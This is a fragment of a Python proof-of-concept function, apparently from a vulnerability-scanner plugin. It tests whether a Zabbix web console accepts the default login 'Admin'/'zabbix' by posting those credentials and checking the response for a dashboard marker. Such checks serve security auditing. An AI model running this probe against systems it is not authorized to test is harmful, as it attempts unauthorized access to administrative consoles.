(url)
| 31 | |
| 32 | |
| 33 | def poc(url): |
| 34 | if '://' not in url: |
| 35 | url = 'http://' + url |
| 36 | h1 = { |
| 37 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', |
| 38 | } |
| 39 | |
| 40 | h2 = { |
| 41 | 'Referer': url.strip('\n'), |
| 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', |
| 43 | } |
| 44 | |
| 45 | blacklist = [ |
| 46 | 'incorrect', |
| 47 | '<!-- Login Form -->', |
| 48 | |
| 49 | ] |
| 50 | try: |
| 51 | s = requests.session() |
| 52 | c = s.get(url, timeout=10, headers=h1) |
| 53 | dic = _get_static_post_attr(c.content) |
| 54 | dic['name'] = 'Admin' |
| 55 | dic['password'] = 'zabbix' |
| 56 | r = s.post(url + '/index.php', data=dic, headers=h2, timeout=10) |
| 57 | if 'chkbxRange.init();' in r.content: |
| 58 | for each in blacklist: |
| 59 | if each in r.content: |
| 60 | return False |
| 61 | return True |
| 62 | return False |
| 63 | except Exception: |
| 64 | return False |
nothing calls this directly
no test coverage detected